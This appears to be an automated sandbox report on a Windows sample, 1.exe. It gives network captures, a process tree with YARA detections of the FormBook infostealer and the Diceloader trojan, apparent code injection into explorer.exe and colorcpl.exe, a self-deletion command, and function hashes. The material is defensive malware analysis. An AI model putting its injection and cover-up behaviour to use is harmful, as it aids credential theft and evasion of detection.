Nov 21, 2023 03:33:19.183007002 CET	218	IN	HTTP/1.1 403 Forbidden Date: Tue, 21 Nov 2023 02:33:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4515 Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: max-age=15 Expires: Tue, 21 Nov 2023 02:33:34 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E4DAWwtzAvJlPfepUXf0REHpRpg1KZxNlQmTEEg912%2B85hBib4Ig2ueyhZIBo3IBp0csP1An1oKj3iUwMIIIyL4ssmB931pkQ0tCLGYp4vFTBSg1TJIfhKEbnPR4ir3dLegP8gN3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Server-Timing: cfRequestDuration;dur=15.000105 Server: cloudflare CF-RAY: 829586f64f218287-IAD alt-svc: h3=":443"; ma=86400 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nof
Nov 21, 2023 03:33:19.183046103 CET	220	IN	Data Raw: 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c Data Ascii: ollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styl
Nov 21, 2023 03:33:19.183083057 CET	221	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f Data Ascii: <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha-container --> <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class
Nov 21, 2023 03:33:19.183118105 CET	222	IN	Data Raw: 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f Data Ascii: -300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">829586f64f218287</strong></span> <span class="cf-footer-separator sm:hidden">•</span> <span id="cf-foo
Nov 21, 2023 03:33:19.183171034 CET	223	IN	Data Raw: 2d 20 2f 23 63 66 2d 77 72 61 70 70 65 72 20 2d 2d 3e 0a 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 Data Ascii: - /#cf-wrapper --> <script> window._cf_translation = {}; </script></body></html>

Target ID:	0
Start time:	03:30:03
Start date:	21/11/2023
Path:	C:\Users\user\Desktop\1.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\1.exe
Imagebase:	0x990000
File size:	750'592 bytes
MD5 hash:	60FF6DCFE9ED4741B4FFB91CD3BD6895
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.2021348011.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2021713062.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2021713062.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2021713062.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2021713062.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2021713062.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:30:04
Start date:	21/11/2023
Path:	C:\Users\user\Desktop\1.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\1.exe
Imagebase:	0xb50000
File size:	750'592 bytes
MD5 hash:	60FF6DCFE9ED4741B4FFB91CD3BD6895
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000002.00000002.2046232928.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000002.00000002.2046258222.0000000001289000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:30:04
Start date:	21/11/2023
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff674740000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000003.00000002.4456583793.00000000103B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000003.00000002.4456692490.00000000108B0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	03:30:06
Start date:	21/11/2023
Path:	C:\Windows\SysWOW64\colorcpl.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\colorcpl.exe
Imagebase:	0xe00000
File size:	86'528 bytes
MD5 hash:	DB71E132EBF1FEB6E93E8A2A0F0C903D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000004.00000002.4449703704.0000000004C50000.00000040.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4449219136.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4449219136.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4449219136.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4449219136.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4449219136.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000004.00000002.4449653470.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4449610086.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4449610086.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4449610086.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4449610086.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4449610086.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	03:30:09
Start date:	21/11/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\Desktop\1.exe"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:30:09
Start date:	21/11/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	76
Total number of Limit Nodes:	2

Executed Functions

Function 02C8D558 Relevance: 1.7, APIs: 1, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02C8D7BE

Memory Dump Source

Source File: 00000000.00000002.2020907498.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c80000_1.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: c2790f7c50266141923f6e79535923a8c48174f918d2ad014f8b340d3e908769
Instruction ID: 43522a34126f3eef1c1efad9e9b2dddce2960652148988034575d614241547ab
Opcode Fuzzy Hash: c2790f7c50266141923f6e79535923a8c48174f918d2ad014f8b340d3e908769
Instruction Fuzzy Hash: 258128B0A00B058FD724EF29D14475ABBF2FF88308F14896ED48AD7A90D775E949CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02C8F764 Relevance: 1.6, APIs: 1, Instructions: 117
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02C8F882

Memory Dump Source

Source File: 00000000.00000002.2020907498.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c80000_1.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: b20be9952c9f5772afdf472eea001fb566e5fe86bafe574f96ef92991d40b574
Instruction ID: cdbc9c7b3feb279ebc99aeb9518c0f2c55706dc979304c0bcb9a55228b4b742a
Opcode Fuzzy Hash: b20be9952c9f5772afdf472eea001fb566e5fe86bafe574f96ef92991d40b574
Instruction Fuzzy Hash: 0451EFB1D003099FDB14DF99C884ADEBBB6FF88304F64812AE818AB210D7749945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02C8C85C Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02C8F882

Memory Dump Source

Source File: 00000000.00000002.2020907498.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c80000_1.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: c4c046f26e25c6d83e0bf93c6a80e43616bd60f3c8bd434eec094b2015c2acd5
Instruction ID: c3a477222c3d350ce99a0cc8f9af8f14a8c10e06e7a1db80f498166ee84288b6
Opcode Fuzzy Hash: c4c046f26e25c6d83e0bf93c6a80e43616bd60f3c8bd434eec094b2015c2acd5
Instruction Fuzzy Hash: 2151C0B1D003099FDB14DF9AC984ADEBBB6FF48314F64812AE819AB210D7749945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02C874B8 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02C87547

Memory Dump Source

Source File: 00000000.00000002.2020907498.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c80000_1.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: dee1f98f63f4a9fb874a1dd375760f32890f22982d382f51c4f647de348f546c
Instruction ID: a4d2fec056e4eec1ce3cc0fedd50a6cc5ed6c86e6fca1c6b76d94b429479ac1a
Opcode Fuzzy Hash: dee1f98f63f4a9fb874a1dd375760f32890f22982d382f51c4f647de348f546c
Instruction Fuzzy Hash: 4121E3B59002499FDB10DFAAD584ADEFFF9EB48310F14841AE958A3210D378A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02C874C0 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02C87547

Memory Dump Source

Source File: 00000000.00000002.2020907498.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c80000_1.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: b6c460e1f252a977f783084e38c2f7d81b4498cbf8c5f93efcddbdcebd7868e3
Instruction ID: d7c824295fc72913f2b8b3e402e40e19c464cb0a5090fbcd127dab56a4fd7279
Opcode Fuzzy Hash: b6c460e1f252a977f783084e38c2f7d81b4498cbf8c5f93efcddbdcebd7868e3
Instruction Fuzzy Hash: E221E3B59002099FDB10DF9AD584ADEFBF9EB48310F14841AE918A3210D378A944CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02C8C6E8 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02C8D839,00000800,00000000,00000000), ref: 02C8DA4A

Memory Dump Source

Source File: 00000000.00000002.2020907498.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c80000_1.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 708cc78781caef3c247659f293d30757389f5e176569c66ca7231242f3e68786
Instruction ID: c0decade210e1f73a62354532a7201887e8aa43a0a321eaad555dd59b369a5d6
Opcode Fuzzy Hash: 708cc78781caef3c247659f293d30757389f5e176569c66ca7231242f3e68786
Instruction Fuzzy Hash: 321114B69042098FCB10DFAAD444ADEFBF5EB88314F10842AE51AA7240C379A944CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 02C8D9D8 Relevance: 1.6, APIs: 1, Instructions: 52
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02C8D839,00000800,00000000,00000000), ref: 02C8DA4A

Memory Dump Source

Source File: 00000000.00000002.2020907498.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c80000_1.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 40a712163e15bae647148d32c47e180f7e603df4f6bbd456eb77a5780c66fc64
Instruction ID: 0ec2982704a75ae126c8e2484cb72c3454eea114b08d2925131c82a85b149b9f
Opcode Fuzzy Hash: 40a712163e15bae647148d32c47e180f7e603df4f6bbd456eb77a5780c66fc64
Instruction Fuzzy Hash: CF11E4B69002498FDB10DFAAD544ADEFBF5EB48314F10841AD919A7240C379A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02C8D758 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02C8D7BE

Memory Dump Source

Source File: 00000000.00000002.2020907498.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c80000_1.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: b434432e475a6df9b9a9485f31e017c4cc4ff213028547d1b59b89aa0a4488d9
Instruction ID: 8bfe559317db7c00ae77650c060b328197d22c66a900ce56aa19881911f40c26
Opcode Fuzzy Hash: b434432e475a6df9b9a9485f31e017c4cc4ff213028547d1b59b89aa0a4488d9
Instruction Fuzzy Hash: DC1110B6C002498FCB10EFAAC444ADEFBF5EF88328F10846AD419A7644C379A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0117D4D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2020386417.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_117d000_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 140d09b5bbdb1492d190183747b6b47e1a80e1d2c14d2bfbb7ab68a4fe8a69f8
Instruction ID: 4fa1d689d0cf7f1d22bcb1733119be87e8c1eb8efe3d0f474364a891df8c4021
Opcode Fuzzy Hash: 140d09b5bbdb1492d190183747b6b47e1a80e1d2c14d2bfbb7ab68a4fe8a69f8
Instruction Fuzzy Hash: 5F21E071504208DFDF09DF98E9C0B26BF75FF88328F248569E9090A356C33AD456CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 0117D3EC Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2020386417.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_117d000_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cab5bdb6533bf00aeb837995f980026af64cc481ad16c1e9cb9d4086530a1eb8
Instruction ID: 6c5c7cd5d8111d28eee3077e1b5abf74de538598094b95ad26df9d58abc041a1
Opcode Fuzzy Hash: cab5bdb6533bf00aeb837995f980026af64cc481ad16c1e9cb9d4086530a1eb8
Instruction Fuzzy Hash: 3021E271504208DFDF099F98E980B66BF75FF94320F20C569D90A0A756C33AE416C6A2

Uniqueness

Uniqueness Score: -1.00%

Function 0118D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2020462168.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_118d000_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93e9e43ebd16a5670016019aa2c034c577a17f659ebc373273cc90cc1b7e7a07
Instruction ID: d625f21b3ada520fed83deb82d45cb5527a6abeac5e66de5160504fce3eb7826
Opcode Fuzzy Hash: 93e9e43ebd16a5670016019aa2c034c577a17f659ebc373273cc90cc1b7e7a07
Instruction Fuzzy Hash: 5221D071604304DFDF19EFA8E984B26BF65EB88354F20C569D94A4B296C33AD407CA62

Uniqueness

Uniqueness Score: -1.00%

Function 0117D4D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2020386417.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_117d000_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: d2e550ae5cc98267c833b2c05c44f480be07736301fde4e011a9f6048aa04578
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: E411AF76504244CFDF16CF54D5C4B16BF71FB88324F2486A9D9090B256C33AD45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0117D3E7 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2020386417.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_117d000_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: b9abc58b983b91d1ccadbdda92ab13634c0fc8f53e6cf09466bf4ec694ba86dd
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: BE11CD72404244CFCF06CF44D5C4B56BF72FB84320F24C5A9D9090A656C33AE45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0118D017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2020462168.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_118d000_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction ID: 255744a7423bc490f9bc4585cdad93af039da2f4fd54855ab3ced92dc801e167
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: DF11A975504380CFDB16DF58E584B15BBA2FB88214F24C6AAD8494B696C33AD40BCFA2

Uniqueness

Uniqueness Score: -1.00%

Function 0117D799 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2020386417.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_117d000_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb4d287fa41b5da4a0f047d64df80e158631d2b10165c0f2155ac0c8c00f3604
Instruction ID: 351c336ec23bac3e547c72c63570a9a8b2dbe814a8ca68ff1fda59c56fdebcfb
Opcode Fuzzy Hash: eb4d287fa41b5da4a0f047d64df80e158631d2b10165c0f2155ac0c8c00f3604
Instruction Fuzzy Hash: 2E01D031005788DAEB249B5DDD84B57FFACEF45324F18C455ED090A396C3799840CA71

Uniqueness

Uniqueness Score: -1.00%

Function 0117D798 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2020386417.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_117d000_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 402eb8cacc4f674fbcae841c05d31ebe2d6e962bbbcaad1ea59fbe9759308168
Instruction ID: 5c662baa4bf0c6e8a28fef5cb644413a9448ec5e79fa3d7eebbe9b9a9efe0003
Opcode Fuzzy Hash: 402eb8cacc4f674fbcae841c05d31ebe2d6e962bbbcaad1ea59fbe9759308168
